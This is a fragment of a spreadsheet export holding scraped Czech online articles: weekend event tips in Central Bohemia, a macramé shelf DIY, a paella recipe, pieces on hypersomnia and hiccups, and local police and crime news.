    <t>TIPY NA VÍKEND: Bitva u Rakovníka, výlov Vyžlovského rybníka nebo Pivní a vinné slavnosti Užijte si víkend s našimi tipy na zajímavé akce. Bitva u Rakovníka 1620 1. listopad 2024 19:00 – 2. listopad 2024 Rakovník (ilustrační foto) | foto: Profimedia Ve dnech 1. – 2. 11. si na rakovnickém letišti připomenete 404. výročí bitvy u Rakovníka a na Bílé hoře . Zažijete dobový vojenský tábor, uvidíte vojenský výcvik a z věrné repliky polní pevnůstky zazní výstřely z kanonu. Dobovou atmosféru dokreslí hudba i tanec a občerstvení. Uvidíte vojenský výcvik, dobové lékařství nebo ochutnáte dobovou stravu a z věrné repliky malé polní pevnosti zazní výstřely z kanonu. Nebude chybět ani hlavní bitevní ukázka rekonstruující dobytí nedalekého Šibeničního vrchu. Následující víkend 9. a 10. listopadu 2024 se pak můžete připojit ke kostýmovanému pochodu od Rakovníka na Bílou horu a ověřit si, jak moc mohla tato cesta ovlivnit bojeschopnost stavovského vojska. Boje u Rakovníka a tato úmorná cesta odtud na Bílou horu totiž na podzim 1620 vedly přímo k dějinnému zlomu na Bílé hoře . Program Pátek 1. 11. 2024 19.00 defilé vojenských jednotek přes rakovnické náměstí s výstupem Fridricha Falckého na Vysokou bránu a projevem k vojsku s ukázkou výcviku Sobota 2. 11. 2024 Rakovnické letiště 10:00 – 10:45 komentovaná prohlídka repliky reduty osazené dělostřeleckou posádkou 11:00 – 11:30 ukázka taktiky vojenských jednotek 11:30 – 12:00 ukázka dobového lékařství 12:00 – 12:30 dobové stravování a ochutnávky 12:30 – 13:00 komentovaná prohlídka dobového tábora 13:00 – 13:30 pohybové divadlo Aventyr – Oceán prachu 13:30 – 14:00 ukázka dobového lékařství 14:00 – 15:00 šarvátka o Šibeniční vrch 15:15 – 16:00 komentovaná prohlídka repliky reduty osazené dělostřeleckou posádkou 16:15 – 16:45 dobová hygiena a kosmetika 17:00 – 18:00 Definitivní Ententýk – koncert sedmičlenné SKA úderky z Litvínova Výlov Vyžlovského rybníka v sobotu 2. 11. Kapři (ilustrační foto) | foto: René Volfík , iROZHLAS.cz Výlov Vyžlovského rybníka proběhne tradičně v sobotu 2. listopadu. Na výlovu si můžete zakoupit čerstvou rybu – kapr, lín, amur, štika, candát, sumec, okoun a ochutnat v občerstvení rybu ze zdejší produkce. Největší rybník z kaskády na Jevanském potoce (rozloha 22,5 ha) leží v nadmořské výšce 403 metry z větší části obklopen lesy. Rybník je primárně určen k chovu ryb, a proto se v něm nesmí chemicky upravovat voda. Chov je pod správou ŠLP v Kostelci nad Černými lesy a povolenky se nevydávají – chytání ryb je zde přísně zakázáno! Pro rybáře je určen sousední rybník Ján u Jevan. Na hrázi se také každoročně na podzim pořádá velkolepý výlov s následnou možností prodeje čerstvých ryb. Více ZDE Svatohubertské slavnosti, zámek Loučeň v sobotu 2. 11. Zámek Loučeň | foto: Středočeská centrála cestovního ruchu U příležitosti listopadového svátku patrona myslivosti Huberta pořádá zámek Loučeň tradiční Svatohubertské slavnosti. Na příchozí čeká den plný zážitků, ale také hudby, sokolnictví, myslivecké kynologie, umění a českých tradic. Zhruba 20 zastavení na téma myslivosti se zaměří především na děti. Pro uměnímilovné účastníky je připraven koncert barokní lovecké hudby a zážitkem bude i troubená a zpívaná Svatohubertská Mše Svatá. Více ZDE Autosalon a Pivní a vinné slavnosti 1. až 3. 11 Výstaviště Lysá nad Labem Výstaviště Lysá nad Labem | foto: Jana Myslivečková , Český rozhlas XXVIII. ročník veletrhu Autosalon nabídne návštěvníkům možnost podrobně se seznámit s novinkami i tradičními modely různých automobilových, ale i motocyklových značek. V samostatné sekci Motor show se představí auta, která se pravidelně zúčastňují tuzemských i zahraničních soutěží. V sobotu se uskuteční tradiční Auto Moto sraz a po celou dobu výstavy mají návštěvníci možnost hlasovat pro nejhezčí vůz tohoto srazu. J etu i další ročník Pivních a vinných slavností, tak přijďte ochutnat alko i nealko pivo , vína z Moravy a Čech a poslechnout si skvělou muziku. K dobrému pití samozřejmě patří také dobré jídlo, proto zde v rámci slavností budou nabízeny také vynikající pochutiny a pro nedočkavce i svatomartinská husička. Více ZDE Světelný park na Nováku, Areál Nový rybník Příbram 2. 11. 2024-12. 1. 2025 Světla vyprávějí v Příbrami (vizualizace) | foto: Světla vyprávějí Příbram se letos stane místem výjimečné podívané. Ve volnočasovém areálu Nový rybník bude 2. listopadu otevřena výstava Světelný vodní svět, která bude probíhat až do 12. ledna 2025. Na návštěvníky čekají nádherné světelné sochy a dekorace z desítek tisíc LED světel, rozsvěcující plochy i cesty areálu každý den od 16 do 21 hodin. Magickou atmosféru a světelné příběhy si zamilují všichni. Více ZDE Jděte do Prčice po celý rok oblast Toulava, celoročně Toulava | foto: Středočeská centrála cestovního ruchu Turistická oblast Toulava představila nové dálkové pěší a cyklotrasy s názvem „Jděte do Prčice po celý rok“. Stezky vedou ze tří měst v regionu Toulava - z Tábora , Milevska a Sedlčan do hlavního města českých pochodů Sedlce -Prčice. Dohromady se jedná o 5 pěších tras a 3 cyklookruhy. Cílem je ukázat krásnou krajinu Jistebnické vrchoviny, okolí Milevska a Sedlčanska celoročně. Celková délka tras je přes 150 km a stezky využívají stávajícího značení Klubu českých turistů. Turisté mohou vidět místa, jako je vyhlídka z vrcholu sjezdovky Monínec , Skanzen Vysoký Chlumec, Klášter Milevsko a další. Více ZDE Smetanovou stezkou 2024 různá místa středních Čech Zámek Loučeň | foto: Zámek Loučeň Klub českých turistů představuje druhý ročník pěší trasy, která vás provede krásnou krajinou a zároveň vás zavede po stopách českého hudebního skladatele Bedřicha Smetany . Akce nabízí čtyři různě dlouhé trasy pro všechny milovníky přírody a hudby. **35 km: Lysá nad Labem – Milovice – Všejany – Jivák – Chudíř – Jabkenice – Loučeň ** Pro ty, kteří mají rádi výzvy a chtějí prozkoumat širší okolí, je tato trasa ideální. Povede vás přes malebná městečka a přírodní rezervace, přičemž si užijete nezapomenutelný pohled na krajinu. **25 km: Mladá Boleslav – Chlum – Vinařice – Dobrovice – Jabkenice – Loučeň ** Střední varianta trasy je vhodná pro ty, kteří chtějí užít si pestrou kombinaci historie, kultury a přírodních krás. Města Mladá Boleslav a Dobrovice přidají do vaší cesty další zajímavé zastávky. **11 km: Loučeň – Jabkenice – Chudíř – Loučeň ** Pro ty, kteří upřednostňují kratší výlet, ale stále chtějí zažít krásu přírody a historie, je tato trasa skvělou volbou. **6 km: Okruh okolím Loučeně ** Ideální pro rodiny s dětmi nebo ty, kteří preferují kratší procházky. Tato trasa vás zavede do okolí Loučeně a umožní vám objevit krásy tohoto malebného regionu. Výlet po stopách Bedřicha Smetany nabízí nejen fyzickou aktivitu, ale také možnost vnímat hudební dědictví velikého skladatele v kontextu nádherné přírody. Připojte se k této jedinečné akci a objevujte krásu českého venkova spojenou s uměleckým dědictvím. Více ZDE Autor: Jana Myslivečková Autor Jana Myslivečková Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20241101_457_3241589706_0f09a5a5d1838729be68.html</t>
  </si>
  <si>
    <t>0f09a5a5d1838729be68</t>
  </si>
  <si>
    <t>Nástěnná police v&amp;nbsp;boho stylu</t>
  </si>
  <si>
    <t>Nástěnná police v&amp;nbsp;boho stylu » Jak na to » Nástěnná police v boho stylu Foto: Pelargonium for Europe Nástěnná police v boho stylu Líbí se vám textilní dekorace v boho stylu? Vytvořte si závěsnou poličku, která váš pokoj nejen zútulní, a navíc má i praktické využití pro vystavení květin, váziček a dalších drobností. Budete potřebovat: větev prkno akumulátorovou vrtačku pevný provázek macramé přízi dřevěné korálky nůžky muškáty a další dekorace na polici Postup: Nejprve si připravte větev, která by měla být delší než plánovaná šířka hotové nástěnné dekorace. Odměřte a ustřihněte provázek, který přivážete na oba konce větve. Tento provázek poslouží k zavěšení dekorace na zeď. Poté ustřihněte další provázky a macramé přízi na požadovanou délku. Tyto provázky přeložte v několika pramenech (po třech až pěti) přes větev a jejich konce provlékněte skrze vytvořenou smyčku. Provázky pak pevně utáhněte. Foto: Pelargonium for Europe Některé prameny spleťte do copánků a zakončete uzlem, jiné nechte volně viset. Další prameny můžete svázat v různých bodech po délce nebo je ozdobit dřevěnými korálky . Prozatím nepracujte s krajními prameny na obou stranách dekorace. Nyní vezměte prkno a uřízněte ho na šířku, kterou by měla mít vaše nástěnná dekorace (dbejte na to, aby bylo o něco kratší než větev). V každém rohu prkna vyvrtejte otvor. Krajní dva prameny, které jste předtím nevyužili, rozdělte na polovinu a každou polovinu provlékněte jedním z předvrtaných otvorů v prkně. Foto: Pelargonium for Europe Poté provázky pod prknem zavažte do uzlů tak, aby zůstalo rovně a pevně na místě. Nakonec zavěste hotovou dekoraci na zeď pomocí provázku připevněného k větvi a ozdobte polici květinami a dalšími dekoracemi podle svého vkusu. Text: red; foto: Pelargonium for Europe Související články Jestli řešíte interiéry prodejen, pozor na časté chyby Trápíte se s odbytem? Na vině mohou být špatně vymyšlené interiéry prodejen. Malí podnikatelé je totiž často zařizují svépomocí a doplácí pak na amatérské přešlapy. Prozkoumejte, jakými triky zvyšují obraty barberům, benzínkám i běžným potravinám profesionální designéři. Tržby pak stoupají až o desítky procent! Přemýšlíte, jakou dekorací si zkrášlit stěny bytu kromě klasických obrázků. Na výběr máte z mnoha možností. Vybrali jsme pro vás několik tipů pro inspiraci. Další články Listopadová Rozmarýna je v prodeji! Nová Rozmarýna je ode dneška na stáncích. Už jste si ulovili své vydání a stihli se začíst? Tady je malá ochutnávka… Celý článek Tvořte a dekorujte s foukacími fixy Práce s foukacími fixy je jednoduchá a baví i děti. Můžete si s nimi ozdobit trička a jiné kousky oděvů, ale i textilní doplňky, jako polštáře, ubrusy či prostírání. Přečtěte si, jak na to. Celý článek Barevná růže z podzimního listí Podzimní listy javorů mají krásné barvy a lákají k dalšímu využití. Oblíbenou dekorací jsou růžičky, které si můžete snadno umotat. Podívejte se, jak na to. Celý článek Kytice se slunečnicemi a třezalkou Uvažte si kytici, která dokonale ozdobí váš stůl. Zkombinujte slunečnice s bobulemi třezalky a vytvořte si působivou dekoraci ve venkovském stylu. Podívejte se, jak na to. Celý článek V nové Rozmarýně najdete Listopad ve znamení šišek Kalendář s vánoční hvězdou Věnec ze starého svetru Kachna 3x jinak Cukroví, které nesmí chybět Časopisy pro volný čas s.r.o. Domažlická 1256/1 Autor: renata.paroulkova Rubrika transition_slide Jak na to</t>
  </si>
  <si>
    <t>1520</t>
  </si>
  <si>
    <t>614000</t>
  </si>
  <si>
    <t>20241101_458_3241592412_4f2655dab941de7777b1.html</t>
  </si>
  <si>
    <t>4f2655dab941de7777b1</t>
  </si>
  <si>
    <t>12x bylo pivo dražší za První republiky než dnes za pivní republiky</t>
  </si>
  <si>
    <t>20241101_459_3241540849_b203f8ac9a39e5fb12ed.html</t>
  </si>
  <si>
    <t>b203f8ac9a39e5fb12ed</t>
  </si>
  <si>
    <t>Sleepyhead: leze na vás podzimní únava, nebo už trpíte hypersomnií?</t>
  </si>
  <si>
    <t>Sleepyhead: leze na vás podzimní únava, nebo už trpíte hypersomnií? V moderním uspěchaném světě, kde se zdá, že na odpočinek zbývá stále méně času, se mnoho lidí potýká s neustálou únavou. Když je ale spánku dostatek, a přesto se během dne dostavuje vyčerpání, může jít o známku vážnějšího problému. #SweetDreams aneb o (správném) spánku od A do Z Co je hypersomnie? Tato porucha spánku – vyznačující se patologicky zvýšenou denní spavostí nebo delší dobou strávenou spánkem – trápí naštěstí asi jen 5 % populace. Protože ale významně narušuje bdělost během dne, dokáže obrátit život vzhůru nohama. Přítomnost hypersomnie může být zkázonosná nejen pro pracovní a soukromý život, ale i zdraví: porucha totiž negativně působí na soustředění, což může způsobovat nepozornost, a tím pádem zvyšovat riziko nehod. Hypersomnie není únava Přestože tyto dva stavy mohou existovat současně, nejsou totožné. Na rozdíl od klasické únavy – která sice může způsobovat psychické i fyzické vyčerpání, ale bez zdrcující ospalosti – dochází při hypersomnii k takové potřebě odpočinku, že člověk podřimuje pravidelně během dne a v situacích s malým množstvím podnětů je dokonce schopný regulérně usnout. Tato porucha se navíc odráží také na počtu prospaných hodin (kterých bývá víc než 11 za 24 hodin, a to v rámci několika po sobě následujících týdnů až měsíců) a specifickou náladou po probuzení. I když prospíte celou noc, stále pociťujete záchvaty únavy, které doprovází podrážděnost, úzkost, zhoršená pozornost a problémy s pamětí. V důsledku těchto příznaků zasahuje hypersomnie do všech oblastí života, a to, jak už jsme uvedli, včetně zdraví. Spánek má totiž prokazatelný dopad na všechny tělesné systémy a jeho nedostatek zvyšuje riziko cukrovky, obezity, duševních poruch, oslabení imunitního systému i hormonálních abnormalit. Podle studie publikované roku 2023 v časopise Journal of the American Heart Association navíc souvisí i se zvýšeným rizikem kardiovaskulárních onemocnění, která jsou v Evropě jedním z hlavních důvodů předčasného úmrtí. 7 „nejpodzimnějších“ filmů do sychravých večerů Co způsobuje nadměrnou spavost? Hypersomnie je fascinující téma, které může mít celou řadu příčin, ať už z pohledu zdraví, nebo životního stylu. Podle National Institute of Neurological Disorders and Stroke k ní mohou přispívat jiné spánkové poruchy, jako je například narkolepsie, ale i onemocnění jako roztroušená skleróza, deprese nebo epilepsie. Na vině bývají také drogy, alkohol a některé léky, v neposlední řadě se jako škodlivý jeví i pravidelný nedostatek kvalitního spánku. Zajímavou kategorií je pak idiopatická hypersomnie, v jejímž případě se vědci domnívají, že mozek produkuje látku, která člověka prostě nutí spát víc, než je potřeba. Diagnostika patří do rukou odborníků Protože tuto poruchu není pokaždé jednoduché prokázat, může její diagnostika připomínat detektivní práci. Ta by měla v každém případě začít návštěvou lékaře, jenž vás vyzpovídá z vašich spánkových návyků, životního stylu i toho, jak se cítíte během dne. Diagnostika hypersomnie zahrnuje krevní testy a případně i polysomnografii, vyšetření ve spánkové laboratoři, jehož účelem je zjistit, jak se vaše tělo chová během spánku. Celý proces sice může vypadat extrémně složitě, odhalení příčin vaší únavy je ale prvním krokem k tomu, abyste se opět cítili energičtější a šťastnější. Podzimní „blues“? Možná za to mohou hormony</t>
  </si>
  <si>
    <t>6030</t>
  </si>
  <si>
    <t>20241101_46_3264810512_75140da167c4459f596b.html</t>
  </si>
  <si>
    <t>75140da167c4459f596b</t>
  </si>
  <si>
    <t>Domácí</t>
  </si>
  <si>
    <t>Shrnutí Domácí + politika (Neděle, 10. listopadu 2024 00:27:02) Pátek 1. 11. 2024 19:24:00 Na opilého muže v Brně nestačil alkoholtester. Výsledek zaskočil i strážníky Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky opilý muž. Když se mu snažili naměřit promile alkoholu v krvi, přístroj ukázal chybu. Ne však proto, že by muž předtím nic nevypil, naopak nadýchal příliš mnoho. Alkoholový tester má přitom technické maximum šest promile. Neuvěřitelnou službu zažili ve čtvrtek při poledni brněnští strážníci. Ty přivolal cestující tramvaje v Řečkovicích poté, co viděl opilého muže povalovat se v těsné blízkosti kolejí. Strážníci následně přijeli zkontrolovat čtyřiapadesátiletého opilého muže a s pomocí cestujícího ho odtáhli z blízkosti kolejí. "Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile," uvedl mluvčí strážníků Jakub Ghanem. Opilý řidič na Zlínsku naboural do garáže. Policisté ho pak našli spát na sedadle Strážníci proto ihned zavolali opilci záchranku a během čekání na její příjezd zkusili test ještě jednou. Na podruhé byl pokus úspěšný. " Přístroj zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice," dodal mluvčí. Opilý muž si za svůj čtvrteční abnormální počin vyslouží pokutu až 20 tisíc korun. Podle takzvaného tabákového zákona mu hrozí peněžní sankce za to, že se v opilém stavu zdržoval na nástupišti hromadné dopravy. Polonahý opilec poničil policejní auta. A to v ulici, kde policie sídlí:</t>
  </si>
  <si>
    <t>420</t>
  </si>
  <si>
    <t>20241101_460_3241535792_845faa5db544366a826c.html</t>
  </si>
  <si>
    <t>845faa5db544366a826c</t>
  </si>
  <si>
    <t>Policie kontrolovala alkohol a drogy u mladistvých. Výsledky vás možná překvapí</t>
  </si>
  <si>
    <t>Policie kontrolovala alkohol a drogy u mladistvých. Výsledky vás možná překvapí Podle tiskové mluvčí strakonické policie byla noční akce zaměřená především na ty, kdo osobám mladším osmnácti let alkohol , tabák či jiné návykové látky zpřístupňují. „Zda k porušování zákazu nedochází, zkontrolovali policisté ve Strakonicích v několika provozovnách. Během policejní akce nebyl zjištěn žádný výskyt podnapilých osob mladších osmnácti let. Nedošlo ani k žádnému narušení veřejného pořádku a žádné mimořádné události,“ zmínila policejní mluvčí. Akce podobného typu budou pokračovat i do budoucna. Policisté se ale na prevenci zaměřují během celého roku, a to například i na středních a základních školách. „Navštěvujeme žáky a studenty s tématy jako je například užívání návykových látek a trestná činnost s tím související,“ doplnila na závěr Jaromíra Nováková. Autor: Klára Aleśová Autor person Klára Alešová</t>
  </si>
  <si>
    <t>4580</t>
  </si>
  <si>
    <t>20241101_461_3241553708_b4de1a3456c14749807b.html</t>
  </si>
  <si>
    <t>b4de1a3456c14749807b</t>
  </si>
  <si>
    <t>Největší vnitřní festival v ČR – Bohém music fest míří na Kladno</t>
  </si>
  <si>
    <t>Největší vnitřní festival v ČR &amp;amp;#8211; Bohém music fest míří na Kladno Největší vnitřní festival v ČR – Bohém music fest míří na Kladno Pátek, 1. listopadu 2024 05:59 Chceš zažít tu nejlepší festivalovou atmosféru i v zimě?Přijď na největší vnitřní festival v ČR – Bohém music fest. 23. listopadu od 15.00 hodin v Kulturním domě Kladno. PŘEDPRODEJ VSTUPENEK NALEZNETE ZDE V Kulturním domě Kladno na tebe čeká 11 interpretů, kteří předvedou tu nejlepší show. Pivo Bohém z Krušovického pivovaru poteče proudem a ty budeš mít tu možnost užít si spoustu zábavy a hudebních i vizuálních zážitků. VÍCE SE O FESŤÁKU DOZVÍŠ ZDE Těšit se můžeš na zpěvačku Kláru Vytiskovou , Ivanu Korolovou , kapelu The Silver Spoons , Th!s, rappera Doriana, Sebastiana, Tomáše Kluse , Bereniku Kohoutovou , PSH, Support Lesbiens a Terezu Maškovou . Autor: Pavel Varvařovský Autor person Pavel Varvařovský Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>3390</t>
  </si>
  <si>
    <t>1410</t>
  </si>
  <si>
    <t>20241101_462_3241550629_bbe084cbdc4f6b3dad97.html</t>
  </si>
  <si>
    <t>bbe084cbdc4f6b3dad97</t>
  </si>
  <si>
    <t>Španělský zázrak z jedné pánve. Naučte se perfektní paellu</t>
  </si>
  <si>
    <t>Španělský zázrak z jedné pánve. Naučte se perfektní paellu Paella byla kdysi pokrmem skromných venkovanů, dnes je z ní ikona španělské kuchyně. A není se čemu divit. Díky své bohaté chuti a jedinečné kombinaci ingrediencí se dostala na stoly po celém světě. Má své kořeny ve španělské Valencii , kde rýži a mořské plody míchali dělníci na otevřeném ohni ve speciální pánvi s uchy zvané paellera. My si ji dnes vychutnáme sice už ze sporáku a v litinovém hrnci či pánvi, ale nemusíte se bát, i tak bude chutnat skvěle. Do tradičního receptu na paellu patří kulatozrnná odrůda rýže bomba, můžete ji ale v klidu vyměnit za italskou arborio. Klíčovou ingrediencí je i šafrán, ten rozhodně nevynechávejte. Paella s krevetami a chorizem Na 4 porce potřebujete: 1 cibuli 3 stroužky česneku 100 g choriza 2 lžíce olivového oleje 300 g rýže (bombo či arborio) ⅓ lžičky šafránu 200 ml španělského bílého vína 1 plechovku krájených rajčat 500 g kuřecího či rybího vývaru 150 g mrazeného hrášku 300 g neloupaných tygřích krevet 300 g drobných krevet 200/300 (mohou být mrazené) 1 hrst hladkolisté petrželky Sůl &amp;amp; pepř Citron k podávání Foto Markéta Marešová Postup: Cibuli nakrájejte na drobné kostičky, česnek na tenké plátky a chorizo na proužky. Rozpalte velkou pánev či litinový hrnec, jakmile je horký, nalijte do něj olej. Do horkého oleje nasypte chorizo a za občasného míchání ho několik minut opékejte. Přidejte cibuli a nechte ji zesklovatět, nakonec přihoďte česnek a jen krátce ho opečte dozlatova. Přisypte syrovou rýži a šafrán a minutu za stálého míchání opékejte. Zalijte vínem a nechte zprudka vařit 3 minuty, aby se vypařil veškerý alkohol . Přidejte krájená rajčata a vývar, osolte, opepřete a dále vařte na střední teplotu deset minut. Promíchejte, pokud je směs až moc hustá, přilijte ještě trochu vývaru. Přiklopte a dále vařte dalších deset minut. Mezitím vyloupejte krevety, několik kusů si nechte na ozdobení paelly. Velké vyloupané i malé krevety spolu s mrazeným hráškem a nasekanou petrželkou přidejte do hrnce a důkladně promíchejte, dle potřeby můžete přidat ještě trochu vývaru. Nakonec nahoru přidejte na ozdobu celé neloupané krevety. Přiklopte poklicí a dále vařte asi pět minut, dokud nejsou krevety růžové a hotové. Podávejte posypané petrželkou a s citronem. Tip: Krevety vyloupejte s předstihem a ze slupek a dalších odřezků uvařte vývar, který použijete do paelly. Foto Markéta Marešová Autor: Markéta Marešová Autor Markéta Marešová</t>
  </si>
  <si>
    <t>20241101_463_3241515916_b90da6d8f30fef906245.html</t>
  </si>
  <si>
    <t>b90da6d8f30fef906245</t>
  </si>
  <si>
    <t>V Hustopečích ochutnáte exkluzivní vína z celého světa! Po roce se opět koná Světový duel vín Redakce GastroIN - 01. 11. 2024 0 Líbil se vám tento článek? 0 Partneři Stát se partnerem V sobotu 23. listopadu od 10 hodin se v Hustopečích uskuteční další, již 14. ročník unikátní výstavy Světový duel vín. Exkluzivní vína světa a vybraná vína z ČR se i letos utkají v pomyslném duelu. Výjimečnou akci nejen na Hustopečsku , ale v celé České republice , založil v roce 2008 hustopečský vinař a majitel prestižního butikového vinařství Miroslav Hrabal, který s kolegy pravidelně objíždí proslulé vinařské oblasti po celém světě a díky svým bohatým kontaktům a zkušenostem přiváží do Česka vína , ke kterým se běžný člověk jen tak nedostane. „Letos by mělo být největším lákadlem burgundské Chardonnay a samozřejmě také Pinoty. Těšit se ale můžete také na méně známé odrůdy, jako je Meursault, Chambertin, Chambolle, Pommard, Montrachet a Chablis. A mnohé jistě potěší tradičnější odrůdy z různých států světa, kterými jsou Ryzlinky, Sauvignony, Merloty nebo třeba Cabernety,“ zve na akci za pořadatele Miroslav Hrabal. Zastoupeny budou vinařské velmoci, jakými jsou Francie , Itálie či Německo . Svá vína ale nabídnou i další zajímavé, i když méně typické regiony či země, kterými je určitě Švýcarsko , Lucembursko , Slovinsko , Izrael a Brazílie . Samozřejmostí jsou pak skvělá vína z domácí produkce. Pořadatelem akce je město Hustopeče za finanční podpory pana Karla Losenického. Líbil se vám tento článek? 0 Komentáře Redakce GastroIN - před 22 hodinami Znojmo chutná samozřejmě po vínu. Přesvědčit se o tom budou moci návštěvníci akce s názvem Chutnáme Znojmo, která se uskuteční 1.... Redakce GastroIN - 07. 11. 2024 Ačkoliv potraviny patří mezi nejčastěji nakupované zboží, reklamovány jsou jen zřídka. Důvody jsou zřejmé – jde o relativně drobné... Redakce GastroIN - 06. 11. 2024 Na předávání státních vyznamenání prezidentem 28. října ani letos nechyběla vína z Moravy a vína z Čech . Ve Španělském sále Pražsk... Reklama • Koupit reklamu Zpravodajství do e-mailu Aktuální zprávy a přehled událostí. Přihlašte se k odběru newsletteru a mějte přehled o tom, co se děje. Autor: Redakce GastroIN</t>
  </si>
  <si>
    <t>246</t>
  </si>
  <si>
    <t>20241101_464_3241514373_77cd37769922f7f61b14.html</t>
  </si>
  <si>
    <t>77cd37769922f7f61b14</t>
  </si>
  <si>
    <t>Krimi zprávy ze Žďárska: extremismus u žďárského soudu, domácí násilí v Meziříčí</t>
  </si>
  <si>
    <t>Krimi zprávy ze Žďárska: extremismus u žďárského soudu, domácí násilí v Meziříčí Zdrogovaný řidič porušil zákaz řízení Test na drogy odhalil amfetamin u řidiče v Křižanově . Dvaatřicetiletý muž z Kladenska navíc řídil i přes zákaz platný do roku 2027. Odmítl se podrobit lékařskému vyšetření. Krimi Muž čelí obvinění z extremismu Soud ve Žďáře nad Sázavou projednává případ šestačtyřicetiletého muže, který měl projevovat sympatie k nacismu a popírat holocaust. Hrozí mu až tři roky vězení. Nebezpečné předjíždění skončilo nehodou Dvě auta se srazila mezi Radostínem nad Oslavou a Zahradištěm . Osmnáctiletá řidička odbočila vlevo, když ji předjíždělo jiné auto. Tři lidé se zranili. Škoda dosáhla sto třicet tisíc korun. Žďársko Opilý muž napadl partnerku Domácí násilí řešila policie v obci u Velkého Meziříčí. Devětačtyřicetiletý muž fyzicky napadl svou partnerku. Podle dechové zkoušky měl v krvi 1,5 promile alkoholu . Skončil na záchytné stanici. Autor: Ondřej Švára Autor person Ondřej Švára Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20241101_465_3292580657_4585bc03a1db50d46d95.html</t>
  </si>
  <si>
    <t>4585bc03a1db50d46d95</t>
  </si>
  <si>
    <t>Škytavka – co ji spouští a jak ji zastavit?</t>
  </si>
  <si>
    <t>Škytavka – co ji spouští a jak ji zastavit? 1. 11. 2024 · 4 minuty čtení Škytavka není nic neobvyklého. Když začneme škytat, obvykle někdo z okolí prohlásí: „Asi na tebe někdo myslí!“ To je sice moc hezké vysvětlení, ale realita je trošku jiná. Podívejme se společně, jak je to se škytavkou doopravdy, co ji způsobuje a jak se jí zbavit. Věděli jste třeba, že může trvat i několik dní či měsíců? Co je to škytavka? Jaké typy škytavky existují? Příčiny škytavky Jak se zbavit škytavky? Prevence škytavky Co je to škytavka? Škytavka, odborně singultus, je definována jako pravidelné nekontrolovatelné stahování bránice, které vede k prudkému nádechu a okamžitému uzavření hlasivek, což vyvolá typický zvuk – „škyt“ čili škytnutí. Škytavka obvykle vzniká podrážděním bránice nebo nervů, které ji ovládají (bloudivý nerv, brániční nerv). Ve většině případů je škytavka neškodná, trvá jen několik minut a odezní sama od sebe, vzácněji ale může být i dlouhodobá a upozornit na vážnější problém. Škytavka se vyskytuje u dětí i dospělých, častěji ji mívají muži. Bránice a její funkce Bránice je velký sval, který odděluje hrudní dutinu od dutiny břišní. Hraje klíčovou roli v dýchacím procesu. Při stažení bránice zvětšuje objem hrudníku a umožňuje vzduchu vstoupit do plic (nádech). Když se uvolní, pohybuje se zpět nahoru a vytlačuje vzduch z plic (výdech). Bránice také pomáhá s dalšími funkcemi, jako je stabilizace trupu při fyzické aktivitě a podpora dalších tělesných činností (kašlání, zvracení nebo tlačení při vyprazdňování). Její poškození nebo podráždění může vést k dýchacím problémům nebo ke škytavce. Jaké typy škytavky existují? Podlé délky trvání rozdělujeme škytavku na tři hlavní typy, běžnou akutní, perzistentní a chronickou. Běžná (akutní) škytavka Akutní škytavka je nejběžnějším typem, který všichni známe. Trvá obvykle několik minut, výjimečně několik hodin a sama odezní. Perzistentní škytavka Tato škytavka již trvá déle než 48 hodin a může být spojena s vážnějšími zdravotními stavy, jako jsou neurologické problémy (např. infekce, nádor či poranění mozku), onemocnění srdce, zánět žaludku či metabolické poruchy, např. porucha funkce ledvin. Chronická škytavka Tento typ škytavky lze také označit jako neztišitelnou škytavku. V tomto případě se již jedná o velmi závažný stav, který trvá déle než měsíc a souvisí obvykle se závažnými poruchami centrální nervové soustavy (např. roztroušená skleróza nebo nádory mozku). Víte, že? ... předčasně narozené děti mohou trávit asi 2 % času škytáním? Někteří vědci se domnívají, že škytání pomáhá jejich dýchacím svalům. To ukazuje, že škytavka může být vývojovou funkcí, zejména v děloze, kde připravuje dítě na to, aby se vyrovnalo s životem „venku“. Příčiny škytavky Škytavka může mít celou řadu příčin, od banálních, jako je přejedení nebo pití nadměrného množství sycených nápojů, až po závažné poruchy nervového systému. Příčiny lze rozdělit podle typu škytavky: Akutní škytavka – příčiny Konzumace velkých porcí jídla, sycených nápojů nebo rychlé polykání vzduchu (např. při žvýkání žvýkačky). Náhlé změny teploty Pití příliš horkých nebo studených nápojů, zmrzlina – to vše může vyvolat nekontrolovatelné stahy bránice. Stres nebo vzrušení U některých lidí je škytavka známkou stresu a psychického vypětí. Alkohol a kořeněná jídla Alkohol a kořeněná jídla také mohou vyvolat podráždění žaludku nebo jícnových nervů. Kouření Při kouření rovněž dochází k polykání vzduchu a podráždění bránice. Dlouhodobá nebo chronická škytavka – příčiny Podráždění bloudivého nebo bráničního nervu Může se vyskytnout např. při gastroezofageálním refluxu, zánětu osrdečníku nebo nádorech v oblasti krku. Poruchy centrálního nervového systému ...mrtvice, poranění mozku nebo infekce jako meningitida. Metabolické poruchy ...cukrovka, nerovnováha elektrolytů (např. hypokalémie = nedostatek draslíku), poruchy funkce ledvin. Léky ...některé léky mohou stimulovat nervy, které vyvolávají škytavku. Anestezie, chirurgické zákroky, vyšetření Při operacích břicha nebo např. při bronchoskopii může dojí k podráždění nervů, které vyvolá dlouhodobou škytavku. Tipů, jak zastavit škytavku, je mnoho, např. zadržování dechu, rozpuštění kostky cukru pod jazykem nebo cucání citronu. Jak se zbavit škytavky? Pokud škytavka trvá déle než pár minut, je velmi obtěžující. Návodů, jak se běžné škytavky zbavit, existuje celá řada. Nejedná se sice o zaručená a vědecky prověřená řešení (studií, které se věnují škytavce není mnoho), ale vyzkoušet je samozřejmě můžete. Některé tipy jsou notoricky známé, jinými vás možná trochu překvapíme. Všechny pomáhají stimulovat nervy spojené s bránicí nebo obnovit normální dýchací rytmus. Zde jsou: Zhluboka se nadechněte a na chvilku zadržte dech (10 - 20 sekund). Několikrát opakujte. Uvolněte se a dýchejte velmi pomalu a kontrolovaně. Zkuste chvilku dýchat do papírového sáčku (dojde ke zvýšení hladinu oxidu uhličitého v krvi, což může pomoci uvolnit 